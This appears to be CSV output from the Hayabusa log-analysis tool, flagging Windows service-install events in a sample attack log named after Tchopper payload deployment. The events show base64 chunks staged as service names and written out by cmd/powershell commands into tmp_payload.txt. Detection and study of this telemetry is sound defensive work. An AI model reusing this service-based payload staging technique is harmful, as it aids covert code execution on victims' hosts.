2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:41.247 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICAgICAgZXhpdA0KICAgICAgICAgICAgDQogICAgICAgIH0gDQoNCiAgICAgICAgDQogICAgIH0NCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg184"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:42.700 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgIGNhdGNoIHsNCiAgICAgDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gU2VsZWN0IEZvbGRlciINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg185"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:44.139 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg186"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:45.593 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg187"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:47.051 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIERyb3AgRG93biBNZW51 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg188"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:48.519 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGJhc2VkIG9uIHRoZSBnaXZlbiBEcm9wIERvd24gT3B0aW9ucw0KDQojQHBhcmFtICREcm9wRG93bk9wdGlvbnMgLT4gIFRoZSBFdmVudCBMb2cgdGhhdCB3aWxsIGJlIGV2YWx1YXRlZCAoU2VjdX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg189"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:49.957 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JpdHksIEFwcGxpY2F0aW9uLCBTeXN0ZW0pDQojQHBhcmFtICRUaXRsZSAgICAgICAgICAgLT4gIFRoZSBUaXRsZSBvZiB0aGUgRHJvcCBEb3duIE1lbnUNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg190"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:51.401 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtSW5wdXRGcm9tRHJvcERvd24gey | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:52.841 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BwYXJhbSgkRHJvcERvd25PcHRpb25zLCAkVGl0bGUpDQoNCiAgICAgdHJ5IHsNCiAgICAgDQogICAgICAgIGZ1bmN0aW9uIFJldHVybi1Ecm9wRG93biB7DQogICAgICAgICAgICAkc2NyaXB0OkNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:54.310 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2ljZSA9ICREcm9wRG93bi5TZWxlY3RlZEl0ZW0uVG9TdHJpbmcoKQ0KICAgICAgICAgICAgJEZvcm0uQ2xvc2UoKQ0KICAgICAgICB9DQoNCiAgICAgICAgJEZvcm0gPSBOZXctT2JqZWN0IFN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:55.761 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS5XaW5kb3dzLkZvcm1zLkZvcm0NCg0KICAgICAgICAkRm9ybS53aWR0aCA9IDMwMA0KICAgICAgICAkRm9ybS5oZWlnaHQgPSAxNTANCiAgICAgICAgJEZvcm0uVGV4dCA9IOKAnVNlbGVjdCAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:57.214 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VGl0bGXigJ0NCg0KICAgICAgICAkRHJvcERvd24gPSBuZXctb2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLkNvbWJvQm94DQogICAgICAgICREcm9wRG93bi5Mb2NhdGlvbiA9IG5ldy1vYmplY3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:58.655 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: QgU3lzdGVtLkRyYXdpbmcuU2l6ZSgxMDAsMTApDQogICAgICAgICREcm9wRG93bi5TaXplID0gbmV3LW9iamVjdCBTeXN0ZW0uRHJhd2luZy5TaXplKDEzMCwzMCkNCg0KICAgICAgICBGb3JFYWNo | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
